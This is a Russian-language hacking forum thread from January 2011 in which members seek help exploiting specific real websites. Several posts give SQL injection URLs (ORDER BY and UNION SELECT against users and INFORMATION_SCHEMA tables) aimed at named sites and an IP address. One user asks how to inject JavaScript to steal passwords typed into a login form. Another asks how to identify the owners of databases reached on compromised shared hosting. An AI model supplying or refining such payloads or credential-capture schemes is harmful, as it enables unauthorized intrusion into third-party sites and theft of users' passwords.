 |
|
18.01.2011, 17:51
|
|
Новичок
Регистрация: 19.11.2008
Сообщений: 1
С нами:
9197319
Репутация:
0
|
|
http://oldtitan.ja.org/challenge.php?page=rules&id=1'+order+by+47+--+
http://oldtitan.ja.org/challenge.php?page=rules&id=1'+union+all+select+nu ll,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null+from+users+--+
не получается для
http://oldtitan.ja.org/area_admin.php?=id3
плз хэлп, возможно ли что нить сделать?
|
|
|
18.01.2011, 19:12
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
Всем привет!
На сайте получил возможность добавлять/изменять новости... возможно ли при помощи js(или еще чего) перехватить какнить вводимые логин и пасс из формы входа???
Куки в принципе не интересуют! ..нужен сам пасс, мб к мылу подойдет и т.п.
|
|
|
|
18.01.2011, 21:16
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от tapapax
Привет. Столкнулся с проблемой: не могу раскрутить инъекцию, т.к. на серве стоит 3й(!!!) мускуль (3.23.55), а как я понял, union'ом там еще не пахло. Попробовал также вложенный запрос, не сработал. Есть ли другие варианты?
http://www.securitylab.ru/contest/212101.php
https://rdot.org/forum/showthread.php?t=32
https://rdot.org/forum/showthread.php?t=503
|
|
|
|
18.01.2011, 21:29
|
|
Новичок
Регистрация: 19.11.2008
Сообщений: 1
С нами:
9197319
Репутация:
0
|
|
вот еще накапал...
http://oldtitan.ja.org/challenge.php?page=rules&id=22'+union+all+select+1 ,2,3,'str1','str2',null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null+from+INFORMATION_SCHE MA.COLUMNS+--+
http://oldtitan.ja.org/area_admin.php?=id3 без успеха...
|
|
|
|
18.01.2011, 23:10
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
http://188.230.77.4:80/src/damagetypes.php?id=%bf'%bf"
помогите раскрутить иньекцию. Вообщем сканерюга выдает ошибку SQL, но UNION , ORDER BY и GROUP BY не работают, и база даных реагирует только на кирилицу и только тогда виплевывает ошыбку, может кто то что то подскажет потому что я уже мозги сломал.
|
|
|
|
19.01.2011, 08:49
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 16
С нами:
8456864
Репутация:
0
|
|
В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .
|
|
|
|
19.01.2011, 09:16
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от GIG
В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .
в форумах я ищу название форумов и топиков, потом по гуглу ищу, в других кмс таким же макаром ищу что нибудь индивидуальное для сайта что бы ссузить список поиска, еще вывожу мыло админа, часто мыла на том же домене что и сайт...вариантов много...
|
|
|
|
19.01.2011, 13:59
|
|
Новичок
Регистрация: 16.01.2011
Сообщений: 2
С нами:
8063606
Репутация:
0
|
|
а есть у кого нить пособие как искать и с чего начинать при поиске XSS
|
|
|
|
19.01.2011, 14:04
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от GIG
В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .
/showthread.php?p=2343252
Сообщение от viziter-msk
а есть у кого нить пособие как искать и с чего начинать при поиске XSS
какие способы хочешь? в статях все нормально написано и описано.. если не понял- читай еще раз
не понимаю я вас...
|
|
|
|
19.01.2011, 15:14
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
С нами:
9667882
Репутация:
170
|
|
как подобные скули крутить? и чем вызвано сиё странное поведение?
http://www.razda4a.ru/?news=12+order+by+5-- |
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
